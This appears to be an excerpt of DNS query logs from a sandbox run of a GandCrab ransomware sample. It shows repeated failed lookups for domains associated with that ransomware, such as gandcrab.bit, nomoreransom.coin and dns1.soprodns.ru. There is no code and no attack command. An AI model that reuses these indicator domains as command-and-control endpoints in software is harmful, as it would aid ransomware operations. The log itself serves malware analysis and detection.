                                      Aug 31, 2022 23:58:39.759757996 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:39.798645973 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:39.823673964 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:39.854238987 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:40.380073071 CEST8.8.8.8192.168.2.30x3115Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:42.943233967 CEST8.8.8.8192.168.2.30x4b60Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:42.983344078 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:43.002011061 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:43.023278952 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:43.043633938 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:43.062766075 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:43.196578026 CEST8.8.8.8192.168.2.30x4b60Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:46.470341921 CEST8.8.8.8192.168.2.30xc71cName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:46.525938988 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:46.544490099 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:46.573009968 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:46.593744993 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:46.614161015 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:52.489172935 CEST8.8.8.8192.168.2.30x4a62Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:52.528167963 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:52.548969030 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:52.570151091 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:52.590229988 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:52.608671904 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:54.588342905 CEST8.8.8.8192.168.2.30xcea6Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:54.628262997 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:54.650563002 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:54.668998957 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:54.689425945 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:54.709500074 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:56.674391985 CEST8.8.8.8192.168.2.30x98daName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:56.730349064 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:56.748970032 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:56.769344091 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:56.792510033 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:56.812910080 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:59.266350985 CEST8.8.8.8192.168.2.30xbf18Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:59.311882973 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:59.332475901 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:59.356389046 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:58:59.374880075 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:59.394289017 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:01.399610996 CEST8.8.8.8192.168.2.30x33a6Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:01.453686953 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:01.474419117 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:01.492651939 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:01.511037111 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:01.529551029 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:03.405114889 CEST8.8.8.8192.168.2.30x4894Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:03.440768003 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:03.461023092 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:03.482172012 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:03.502460003 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:03.521188974 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:06.501457930 CEST8.8.8.8192.168.2.30x428cName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:06.537347078 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:06.560595989 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:06.581572056 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:06.599746943 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:06.617580891 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:12.252245903 CEST8.8.8.8192.168.2.30xf42eName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:12.296758890 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:12.317811966 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:12.348246098 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:12.368700981 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:12.389571905 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:14.311661005 CEST8.8.8.8192.168.2.30x4340Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:14.352329969 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:14.371464014 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:14.392226934 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:14.412553072 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:14.435400963 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:15.756638050 CEST8.8.8.8192.168.2.30xca4bName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:15.786377907 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:15.808978081 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:15.827245951 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:15.856257915 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:15.874497890 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:18.240111113 CEST8.8.8.8192.168.2.30x160bName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.268676043 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:18.286752939 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.304971933 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:18.325037003 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.345073938 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:18.697067022 CEST8.8.8.8192.168.2.30x160bName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.690124035 CEST8.8.8.8192.168.2.30x9891Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.719475031 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:20.740108013 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.757486105 CEST8.8.8.8192.168.2.30x9891Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.760489941 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:20.779664040 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.799532890 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:22.145498037 CEST8.8.8.8192.168.2.30xc448Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:22.173274994 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:22.191287994 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:22.215575933 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:22.235313892 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:22.255491972 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:24.179404020 CEST8.8.8.8192.168.2.30x9641Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:24.206090927 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:24.226692915 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:24.245124102 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:24.265338898 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:24.285284042 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:27.165951967 CEST8.8.8.8192.168.2.30x72c8Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:27.189124107 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:27.209870100 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:27.267399073 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:27.286777020 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:27.307277918 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:27.705112934 CEST8.8.8.8192.168.2.30x72c8Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.836324930 CEST8.8.8.8192.168.2.30xbe66Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.862699986 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:30.884212971 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.904670000 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:30.922668934 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.942532063 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:32.146146059 CEST8.8.8.8192.168.2.30xbe66Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:32.299428940 CEST8.8.8.8192.168.2.30xc8b1Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:32.323093891 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:32.343451023 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:32.364872932 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:32.385454893 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:32.415087938 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:36.530746937 CEST8.8.8.8192.168.2.30x6b6bName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:36.563038111 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:36.583677053 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:36.602057934 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:36.620131016 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:36.640644073 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:36.792453051 CEST8.8.8.8192.168.2.30x6b6bName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.088445902 CEST8.8.8.8192.168.2.30x6b6bName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.439719915 CEST8.8.8.8192.168.2.30xbe0fName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.465456009 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:39.483722925 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.503002882 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:39.521054029 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.540900946 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:39.567404985 CEST8.8.8.8192.168.2.30xbe0fName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.827275038 CEST8.8.8.8192.168.2.30x3976Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.853662968 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:40.873889923 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.891818047 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:40.909749031 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.930310965 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:42.224383116 CEST8.8.8.8192.168.2.30x94a7Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.254621983 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:42.280628920 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.301055908 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:42.321456909 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.341794014 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:45.634243011 CEST8.8.8.8192.168.2.30x70aeName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.670564890 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:45.691019058 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.711270094 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:45.729429960 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.756819010 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:45.793020010 CEST8.8.8.8192.168.2.30x70aeName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:46.698057890 CEST8.8.8.8192.168.2.30x70aeName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.139800072 CEST8.8.8.8192.168.2.30xed4Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.167660952 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:48.188586950 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.209095001 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:48.238341093 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.259392023 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:48.697335958 CEST8.8.8.8192.168.2.30xed4Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.544496059 CEST8.8.8.8192.168.2.30xae84Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.575448990 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:50.592947006 CEST8.8.8.8192.168.2.30xae84Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.596391916 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.624696016 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:50.648333073 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.668668032 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:51.954930067 CEST8.8.8.8192.168.2.30x4be7Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:51.988468885 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:52.008342981 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:52.042766094 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:52.062791109 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:52.083273888 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:53.888886929 CEST8.8.8.8192.168.2.30x8b86Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:53.930005074 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:53.951704979 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:53.972112894 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:53.996426105 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:54.017124891 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:56.294773102 CEST8.8.8.8192.168.2.30x1e6dName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.322354078 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:56.342601061 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.360450983 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:56.380527020 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.400538921 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:56.951119900 CEST8.8.8.8192.168.2.30x1e6dName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.635045052 CEST8.8.8.8192.168.2.30x2252Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.666646004 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:57.687072039 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.705380917 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:57.725605011 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
